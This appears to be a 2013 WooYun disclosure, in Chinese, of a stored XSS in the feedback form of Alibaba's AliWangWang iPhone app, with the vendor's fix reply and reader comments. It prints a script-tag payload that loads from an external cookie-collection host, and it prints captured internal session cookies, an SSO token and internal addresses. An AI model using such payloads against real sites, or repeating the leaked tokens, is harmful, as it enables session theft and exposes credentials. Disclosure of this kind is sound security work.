阿里巴巴xss跨站漏洞可获得内网cookies

漏洞概要

缺陷编号:WooYun-2013-017693

漏洞标题:阿里巴巴xss跨站漏洞可获得内网cookies

相关厂商:阿里巴巴

漏洞作者:阿峰

提交时间:2013-01-23 08:37

公开时间:2013-03-09 08:38

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2013-01-23: 细节已通知厂商并且等待厂商处理中
2013-01-24: 厂商已经确认,细节仅向厂商公开
2013-02-03: 细节向核心白帽子及相关领域专家公开
2013-02-13: 细节向普通白帽子公开
2013-02-23: 细节向实习白帽子公开
2013-03-09: 细节向公众公开

简要描述:

xss漏洞,大家都懂的,可获得cookies

详细说明:

只是抱着试试看的态度,没想到真的出现了...该漏洞是出现在阿里旺旺的手机客户端,由于我同时测试的旺信和阿里旺旺两个软件,都属于阿里巴巴,所以不知道是哪一个出现的。为了安全,没再测试,直接来提交了。测试版本为手机iphone版,在软件的【反馈】里写入xss测试代码,<script src="http://xss.sh3llc0de.com/?u=ddc05c"></script>提交成功。十分钟之内没有收到cookies,就失望了,但刚才去看了看...哈哈。

漏洞证明:

信息IP:121.0.29.205地址:中国浙江杭州电信企业阿里巴巴公司操作系统:Windows XP浏览器:Chrome 24.0.1312.52时间:2013-01-22 19:06:45cookiesUSER_COOKIE=BDC4D499AACAC40F7021847DB20A7620; SSO_TOKEN=594E51ADB89572C8F71E9C45F25A3684020D1640DEDF9946EAD585C231395E6711ED2B70672DF1CDFC2D299A49F5CB04; LAST_HEART_BEAT_TIME=9411E114E035D380C6A967891863C6D3; JSESSIONID=1g8tf43ade2j2e8ihhzxm20lk地址http://172.22.7.46:8080/usersuggestion/index.do?source=ios

修复方案:

过滤非法字符...

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-01-24 13:22

厂商回复:

非常感谢您对阿里巴巴的关注,您反馈的问题我们已经修复完毕。谢谢,稍后会发送礼品表示感谢~~ O(∩_∩)O

最新状态:

暂无

评价

  1. 2010-01-01 00:00 小胖胖要减肥 白帽子 | Rank:492 漏洞数:66)

    @xsser 内网cookies威胁在哪里,基本后台进不去感觉用处不大

  2. 2010-01-01 00:00 Hxai11 白帽子 | Rank:970 漏洞数:147)

    @小胖胖要减肥 实话,内网渗透有用(*^__^*)

  3. 2010-01-01 00:00 px1624 白帽子 | Rank:963 漏洞数:126)

    确认可以获取到cookie并成功登陆??

  4. 2010-01-01 00:00 GuoKer(ZhuLiu) 白帽子 | Rank:138 漏洞数:18)

    javascript可以执行shellcode,想想网马,危害在哪里~~~~~